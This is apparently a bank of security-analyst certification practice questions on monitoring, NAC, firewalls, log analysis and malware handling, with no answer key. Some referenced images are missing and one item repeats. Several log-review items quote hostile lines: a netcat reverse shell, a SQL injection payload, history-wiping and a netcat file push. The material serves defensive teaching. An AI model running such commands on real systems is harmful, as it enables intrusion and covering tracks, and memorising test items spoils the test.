James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
The malware is polymorphic and is being identified as multiple viruses because it is changing.
Different antimalware engines call the same malware package by different names.
VirusTotal has likely misidentified the malware package, and this is a false positive.
The malware contains multiple malware packages, resulting in the matches.
Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?
MemCheck
Performance Monitor
WinMem
Top
Abul wants to identify typical behavior on a Windows 10 system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time and performance over a period of time?
sysmon
sysgraph
resmon
resgraph
The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
Calculating minimum viable signature length
Binary fingerprinting to identify the malware author
Building a similarity graph of similar functions across binaries
Heuristic code analysis of development techniques
How is integrated intelligence most commonly used in a firewall system?
The firewall searches for new IPs to block and creates a STIX feed entry.
The intelligence feed provides firewall rules that are implemented on the firewall in real time.
Threat intelligence is used to provide IP information for rules.
Named threat actors are blocked based on their threat level and resource model.
What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
A scripted application installation
Remote execution of code
A scripted application uninstallation
A zero-day attack
Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?
80 and 443
22 and 80
80 and 8088
22 and 443
Use this scenario for questions 8–10.
Lucy is an SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
Heuristic
Behavior
Availability
Anomaly
After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudo-code as follows:
Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.
The average administrator at Lucy's organization is responsible for 150–300 machines.
What danger does Lucy's alert create?
A DDoS that causes administrators to not be able to access systems
A network outage
Administrators may ignore or filter the alerts
A memory spike
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
Trend
Availability
Heuristic
Behavior
Disabling unneeded services is an example of what type of activity?
Threat modeling
Incident remediation
Proactive risk assessment
Reducing the threat attack surface area
Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
A NetBIOS file share
A RADIUS connection
An RDP connection
A Kerberos connection
Angela wants to prevent buffer overflow attacks on a Windows system. What two built-in technologies should she consider?
The memory firewall and the stack guard
ASLR and DEP
ASLR and DLP
The memory firewall and the buffer guard
Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model?
802.1x
DMARC
SPF
802.3
Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
The sudoers file
/var/log/sudo
/var/log/auth.log
root's .bash_log
When Pete connects to his organization's network, his PC runs the NAC software his systems administrator installed. The software communicates to the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using?
Agent-based, in-band
Agentless, in-band
Agent-based, out-of-band
Agentless, out-of-band
What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
How often the directory is accessed
If files in the directory have changed
If sensitive data was copied out of the directory
Who has viewed files in the directory
While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
The user has opened a command prompt on their workstation.
The user has opened a command prompt on the desktop of a remote workstation.
The user has opened an interactive command prompt as administrator on a remote workstation.
The user has opened a command prompt on their workstation as Administrator.
Brian writes a Snort rule that reads
alert tcp any any -> 10.10.11.0/24 3306
What type of traffic will he detect?
MySQL traffic
RDP traffic
LDAP traffic
BGP traffic
What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators?
An IPS
UEBA
An IDS
DMARC
Sadiq wants to deploy an IPS at a network location that will maximize its impact while avoiding unnecessary load. If he wants to place it near the network border shown in the following image, where should he place it?
Point A
Point B
Point C
Point D
While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening?
A firewall is blocking connections from occurring
An IPS is blocking connections from occurring
A SYN flood
An ACK blockage
While reviewing Windows event logs for a Windows 10 system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
The system was shut down.
Another antivirus program has interfered with the scan.
The user disabled the scan.
The scan found a file it was unable to scan.
Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
Blacklisting
IP reputation
Whitelisting
Domain reputation
Gabby executes the following command. What is she doing?
ps -aux | grep apache2 | grep root
Searching for all files owned by root named apache2
Checking currently running processes with the word apache2 and root both appearing in the output of top
Shutting down all apache2 processes run by root
There is not enough information to answer this question.
While reviewing email headers, Saanvi notices an entry that reads:
Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it?
Spoofing MAC addresses
Providing valid credentials
Spoofing IP addresses
Providing fake credentials
Fiona wants to prevent email impersonation of individuals inside her company. What technology can help prevent this?
IMAP
SPF
DKIM
DMARC
Which of the items from the following list is not typically found in an email header?
Sender IP address
Date
Receiver IP address
Private key
Questions 30–32 refer to the following scenario:
Chris is troubleshooting the firewall rulebase that appears here:
Users are reporting that inbound mail is not reaching their accounts. Chris believes that rule 1 should provide this access. The organization's SMTP server is located at 10.15.1.1. What component of this rule is incorrect?
Protocol
Source port
Destination IP
Destination port
The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong?
The protocol is incorrect.
The rules are misordered.
The source port is not specified.
There is no error in the rule, and Chris should check for other issues.
Rule 4 is designed to allow SSH access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong?
The protocol is incorrect.
The rules are misordered.
The destination port is incorrect.
There is no error in the rule, and Chris should check for other issues.
Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested?
Install host firewalls on the systems
Move to a NAT environment
Install an IPS
None of the above
The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
The threat actor
The targeting method
The attack vector
The organizational weakness
Manish is using a NAC system and wants to allow users who do not meet admission requirements to patch their machines. What technique should he use to allow this?
Deny access to the network and require users to connect to a different network to patch before they reconnect
Build a quarantine network that allows access to update sites and tools
Deny all access and contact tech support to patch the system
Allow access and force a reboot after patching
Lisa is aware that multiple members of her organization fell for a phishing attack. What attack vector should she worry about based on this?
Compromised credentials
Malicious insiders
Ransomware
Brute-force
Matt believes that developers in his organization deployed code that did not implement cookies in a secure way. What type of attack would be aided by this security issue?
SQL injection
A denial-of-service attack
Session hijacking
XSS
What type of attack is a back-off algorithm intended to limit or prevent?
Denial-of-service attacks
Brute-force attacks
Compromised credential-based attacks
Trojans
Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources?
STIX and TAXII
SAML and OCSP
STIX and CAB
SAML and TAXII
Cassandra is documenting a threat actor using the STIX 2.0 standard, and she describes the threat actor as wanting to steal nuclear research data. What type of label would this receive in the STIX taxonomy?
An alias
A goal
Their sophistication
Their resource level
Jamal wants to leverage a framework to improve his threat hunting for network defense. What threat hunting framework should he select to help his team categorize and analyze threats more effectively?
MOPAR
CVSS
MITRE ATT&CK
CAPEC
Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements?
Whitelisting
Port Security
NAC
EAP
During a log review, Mei sees repeated firewall entries as shown here:
What service is the remote system most likely attempting to access?
H.323
SNMP
MS-SQL
Oracle
While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
A packer
A crypter
A shuffler
A protector
While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP. What should Nara report has occurred?
Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?
The firewall
The router
The distribution switch
The Windows 2019 server
The Snort IPS that Adam has configured includes a rule that reads
A system that Carlos is responsible for has been experiencing consistent denial of service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?
IP-based blacklisting
Dropping all SYN packets
Using a connection rate or volume-limiting filter per IP
Using a route-blocking filter that analyzes common LOIC routes
Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity?
Prepare
Engage
Presence
Effect
Cormac needs to lock down a Windows workstation that has recently been scanned using nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?
80, 135, 139, and 445
80, 445, and 3389
135, 139, and 445
No ports should be open.
Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?
select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process.action = 'launch'
Processes other than explorer.exe typically do not launch command prompts.
cmd.exe should never launch explorer.exe.
explorer.exe provides administrative access to systems.
cmd.exe runs as administrator by default when launched outside of Explorer.
During Cormac's configuration of his organization's network access control policies, he sets up client OS rules that include the following statements:
ALLOW Windows 7 version *, Windows 10 version *
ALLOW OSX version *
ALLOW iOS 8.1, iOS 9 version *
ALLOW Android 7.*
After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?
Insecure clients
Incorrect NAC client versions
OS version mismatch
Patch level mismatch
Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as?
DNS masquerading
DNS sinkholing
DNS re-sequencing
DNS hierarchy revision
Maria is an Active Directory domain administrator for her company, and she knows that a quickly spreading botnet relies on a series of domain names for command and control, and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems?
Force a BGP update
Set up a DNS sinkhole
Modify the hosts file
Install an antimalware application
While analyzing a malware package, Ryan finds a list of hostnames shown here:
Mark writes a script to pull data from his security data repository. The script includes the following query:
select source.name, data.process.cmd, count(*) AS hostcount from windows-events where type = 'sysmon' AND data.process.action = 'launch' AND data.process.image.file = 'reg.exe' AND data.process.parentImage.file = 'cmd.exe'
He then queries the returned data using the following script:
select source.name, data.process.cmd, count(*) AS hostcount from network-events where type = 'sysmon' AND data.process.action = 'launch' AND data.process.image.file = 'cmd.exe' AND data.process.parentImage.file = 'explorer.exe'
What events will Mark see?
Uses of explorer.exe where it is launched by cmd.exe
Registry edits launched via the command line from Explorer
Registry edits launched via explorer.exe that modify cmd.exe
Uses of cmd.exe where it is launched by reg.exe
Chris operates the point-of-sale (POS) network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the POS terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI DSS and protect his vulnerable systems?
Replace the Windows embedded point of sale terminals with standard Windows systems
Build a custom operating system image that includes the patch
Identify, implement, and document compensating controls
Remove the POS terminals from the network until the vendor releases a patch
Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
Enable host firewalls
Install patches for those services
Turn off the services for each appliance
Place a network firewall between the devices and the rest of the network
Michelle runs the following grep command. What text will it match?
grep -i example *.txt
All text files in the current directory with the word example in it
All occurrences of the text example in all files in the current directory with a .txt extension
All occurrences of the lowercase text example in all files in the current directory with a .txt extension
All TXT files with a filename including the word example in the current directory and all subdirectories
Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection?
TLS
VPN
DLP
FDE
Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?
top
ls -mem
mem
memstat
Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort?
Implement logging
Validate all inputs
Parameterize queries
Error and exception handling
Latisha wants to ensure that BYOD workstations that connect to her network meet specific minimum operating system patch level requirements. She also wants to place them into the correct VLAN for the user group that the logged-in user belongs to. She is deploying her solution to an existing, complex network. What solution should she recommend?
Agent-based, in-line NAC
Agentless, in-line NAC
Agent-based, out-of-band NAC
Agentless, out-of-band NAC
Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this?
Group Policy Object
Organizational unit
Active Directory forest
Domain controller
Eric wants to send an email using a digital signature to ensure that the recipient can prove that the email was sent by him and that the content has not changed. What technology is frequently used for this?
S/MIME
IMAP
DKIM
TLS
Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C; which set of commands will accomplish this?
Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?
iptables -A OUTPUT -d 10.24.31.11 -j DROP
iptables -A INPUT -d 10.24.31.11 -j ADD
iptables -block -host 10.24.31.11 -j DROP
iptables -block -ip 10.24.31.11 -j ADD
Use the following scenario and image to answer questions 68–70.
While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the information shown in the following image:
What issue should Amanda report to the system administrator?
High network utilization
High memory utilization
Insufficient swap space
High CPU utilization
What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
ps
top
proc
load
What command can Amanda use to terminate the process?
term
stop
end
kill
What type of attack does a network administrator need to be aware of when deploying port security?
MAC address spoofing
IP address spoofing
Denial-of-service attacks
ARP spoofing
Piper wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?
# iptables --policy INPUT DROP
# iptables --policy SERVICE DROP
# iptables --policy OUTPUT DROP
# iptables --policy FORWARD DROP
Syd inputs the following command on a Linux system:
# echo 127.0.0.1 example.com >> /etc/hosts
What has she done?
She has added the system to the allowed hosts file.
She has routed traffic for the example.com domain to the local host.
She has overwritten the hosts file and will have deleted all data except this entry.
While reviewing output from the netstat command, John sees the following output. What should his next action be?
[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
Capture traffic to 151.101.2.69 using Wireshark
Initiate the organization's incident response plan
Check to see if 151.101.2.69 is a valid Microsoft address
Ignore it; this is a false positive.
What does EDR use to capture data for analysis and storage in a central database?
A network tap
Network flows
Software agents
Hardware agents
While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
Enabling the Bash history
Appending the contents of /dev/null to the Bash history
Logging all shell commands to /dev/null
Allowing remote access from the null shell
Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this?
Reviewing the Message-ID to see if it has been incremented
Checking for the In-Reply-To field
Checking for the References field
You cannot determine if a message was forwarded by analyzing the headers.
While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
Continue to search for other changes
Run diff against the password file
Immediately change her password
Check the passwd binary against a known good version
Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes too?
Scheduled tasks
Service replacement
Service creation
Autostart registry keys
Matt is reviewing a query that his team wrote for their threat hunting process. What will the following query warn them about?
select timeInterval(date, '4h'), `data.login.user`, count(distinct data.login.machine.name) as machinecount from network-events where data.winevent.EventID = 4624 having machinecount > 1
Users who log in more than once a day
Users who are logged in to more than one machine within four hours
Users who do not log in for more than four hours
Users who do not log in to more than one machine in four hours
Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
grep
more
less
strings
Which of the following is not a limitation of a DNS sinkhole?
They do not work on traffic sent directly to an IP address.
They do not prevent malware from being executed.
They can be bypassed using a hard-coded DNS server.
They cannot block drive-by-download attempts.
Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.
What is the Security Content Automation Protocol used for?
Assessing configuration compliance
Testing for sensitive data in transit
Testing for sensitive data at rest
Assessing threat levels
Damian has discovered that systems throughout his organization have been compromised for over a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
Criminal
Hacktivist
APT
Unknown
While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?
CSV
Flat file
API
Email
Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?
The email's headers
Embedded links in the email
Attachments to the email
The email signature block
While reviewing NetFlows for a system on her network, Alice discovers the following traffic pattern. What is occurring?
An SFTP scan with unsuccessful connection attempts
Ric is working on reverse-engineering a malware sample and wants to run the binary but also control the execution as it occurs. What type of tool should he select for this?
A disassembler
A decompiler
A debugger
An unpacker
Jennifer wants to search for terms including “CySA+” and all other variations of the text regardless of which letters may be capitalized. Which of the following commands will find all the terms that match what she is searching for in a text file named example.txt?
grep -i cysa+ example.txt
grep -uc CySA+ example.txt
grep -case cysa+ example.txt
grep example.txt cysa+
Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
Removing all links in email
Redirecting links in email to a proxy
Scanning all email using an antimalware tool
Using a DNS blackhole and IP reputation list
James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?
A sandbox
A physical machine
A container
A DMARC
While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start          Duration  Proto  Src IP Addr:Port       Dst IP Addr:Port   Packets  Bytes  Flows
2019-07-11 13:06:46.343  21601804  TCP    10.1.1.1:1151    ->    10.2.2.3:443       9473640  9.1 G  1
2019-07-11 13:06:46.551  21601804  TCP    10.2.2.3:443     ->    10.1.1.1:1151      8345101  514 M  1
A web browsing session
Data exfiltration
Data infiltration
A vulnerability scan
Luis discovers the following entries in /var/log/auth.log. What is most likely occurring?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
A user has forgotten their password
A brute-force attack against the root account
A misconfigured service
A denial-of-service attack against the root account
Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
Add an iptables rule blocking root logins
Add root to the sudoers group
Change sshd_config to deny root login
Add a network IPS rule to block root logins
Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command.
at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
It uses the AT command to dial a remote host via NetBIOS.
It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred?
A user has attempted to reauthenticate too many times.
PAM is configured for three retries and will reject any additional retries in the same session.
Fail2ban has blocked the SSH login attempts.
Root is attempting to log in via SSH from the local host.
Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job?
Time-based
Rule-based
Role-based
Location-based
Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?
A containerization tool
A virtualization tool
A sandbox tool
A packet analyzer
While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
nc -l -p 43501 < example.zip
What happened?
The user set up a reverse shell running as example.zip.
The user set up netcat as a listener to push example.zip.
The user set up a remote shell running as example.zip.
The user set up netcat to receive example.zip.
Susan is hunting threats and performs the following query against her database of event logs. What type of threat is she looking for?
SELECT source.name, destination.name, COUNT(*) FROM network_events WHERE destination.port = '3389' GROUP BY source.name, destination.name
SSH
MySQL
RDP
IRC
At what point in a continuous integration (CI)/continuous delivery (CD) pipeline should security testing be performed?
After code is checked into the repository
After code is deployed into an automated test environment
After the code is deployed into production
All of the above
Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows 10 Pro workstations?
Using application whitelisting to prevent all prohibited programs from running
Using Windows Defender and adding the game to the blacklist file
Listing it in the Blocked Programs list via secpol.msc
You cannot blacklist applications in Windows 10 without a third-party application
While reviewing his Apache logs, Oscar discovers the following entry. What has occurred?
10.1.1.1 - - [27/Jun/2019:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
A successful database query
A php overflow attack
A SQL injection attack
An unsuccessful database query
Jason wants to reverse-engineer a malware package. Which of the following tools should he use if he wants to do behavior-based analysis of a worm?
A disassembler
A network analyzer
A PE viewer
A debugger
What will a search using the following command do?
grep -n -i -v mike *
List all the lines where the word Mike shows up, regardless of case in all files in the current directory
Search all files with the word mike in the filename for lowercase words
Search a file named mike for all uppercase words
List all the lines where the word Mike does not show up, regardless of case, in all files in the current directory
Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?
-rwxrw-r-- 1 chuck admingroup 1232 Feb 28 16:22 myfile.txt
User chuck has read and write rights to the file; the administrators group has read, write, and execute rights; and all other users only have read rights.
User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
While reviewing web server logs, Danielle notices the following entry. What occurred?
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
A theme was changed
A file was not found
An attempt to edit the 404 page
The 404 page was displayed
Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?
UEBA
SOAR
SIEM
MDR
While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:
service rogueservice stop
After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?
The service restarted at reboot, so she needs to include the -p, or permanent, flag.
The service restarted itself, so she needs to delete the binary associated with the service.
The service restarted at reboot, so she should add an .override file to stop the service from starting.
A malicious user restarted the service, so she needs to ensure users cannot restart services.
Why might Mark choose to implement an IPS instead of an IDS?
The IPS can detect attacks that an IDS cannot.
The IPS can block attacks in addition to reporting them.
The IPS can use heuristic analysis.
The IPS can use signature-based analysis.
While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks on the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
An encrypted RAT
A VPN application
A secure web browser
A base64 encoded packet transfer utility
Bohai uses the following command while investigating a Windows workstation used by his organization's vice president of Finance, who only works during normal business hours. Bohai believes that the workstation has been used without permission by members of his organization's cleaning staff after hours. What does he know if the userID shown is the only userID able to log in to the system, and he is investigating on August 12, 2019?
C:\Users\igfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount  LastLogon                  Name
                                             NT AUTHORITY\SYSTEM
0                 20190811203748.000000-240  Finance\igfish
The account has been compromised.
No logins have occurred.
The last login was during business hours.
Bohai cannot make any determinations from this information.
After a series of compromised accounts led to her domain being blacklisted, Wang has been asked to restore her company's email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?
Migrate her company's SMTP servers to new IP addresses.
Migrate to a cloud email hosting provider.
Change SMTP headers to prevent blacklisting.
Work with the blacklisting organizations to get removed from the list.
While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
Anomalous behavior
Heuristic behavior
Entity behavior
Known-good behavior
While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start          Duration  Proto  Src IP Addr:Port -> Dst IP Addr:Port  Packets  Bytes  Flows
2019-07-11 13:06:46.343  21601804  TCP    10.1.1.1:1151 -> 10.2.2.3:443         9473640  9.1 G  1
2019-07-11 13:06:46.551  21601804  TCP    10.2.2.3:443 -> 10.1.1.1:1151         8345101  514 M  1
A web browsing session
Data exfiltration
Data infiltration
A vulnerability scan
How does data enrichment differ from threat feed combination?
Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third-party data to focus on core data elements rather than adding together multiple data sources.
Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
Threat feed combination is more useful than data enrichment because of its focus on only the threats.
Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?
Route poisoning
Antimalware router filters
Subdomain whitelisting
DNS blackholing
Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?
An IPS
An IDS
A HIPS
A HIDS
Attackers have been attempting to log in to Alaina's Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?
Prevent console login via SSH
Implement a login-block feature with back-off settings
Move the administrative interface to a protected network
Disable console access entirely
The NetFlow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?
Enable QoS
Enable NetFlow compression
Enable sampling
None of the above
Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, which are becoming more prevalent, and which are decreasing in occurrence. What type of analysis can she perform using this information?
Anomaly
Trend
Heuristic
Availability
Which of the following capabilities is not a typical part of a SIEM system?
Alerting
Performance management
Data aggregation
Log retention
Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
Use sha1sum to generate a hash for the file and write a script to check it periodically
Install and use Tripwire
Periodically check the MAC information for the file using a script
Encrypt the file and keep the key secret so the file cannot be modified
Maria wants to deploy an antimalware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?
Signature-based
Heuristic-based
Trend-based
Availability-based
Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
Anomalies in privileged account usage
Time-based login information
A mobile device profile change
DNS request anomalies
Miguel works for a company that has a network security standard requiring the collection and storage of NetFlow logs from all datacenter networks. Miguel is working to commission a new datacenter network but, due to technical constraints, will be unable to collect NetFlow logs for the first six months of operation. Which one of the following data sources is best suited to serve as a compensating control for the lack of NetFlow information?
Router logs
Firewall logs
Switch logs
IPS logs
Megan wants to check memory utilization on a Macintosh system. What Apple tool can she use to do this?
Activity Monitor
MemControl
Run memstat from the command line
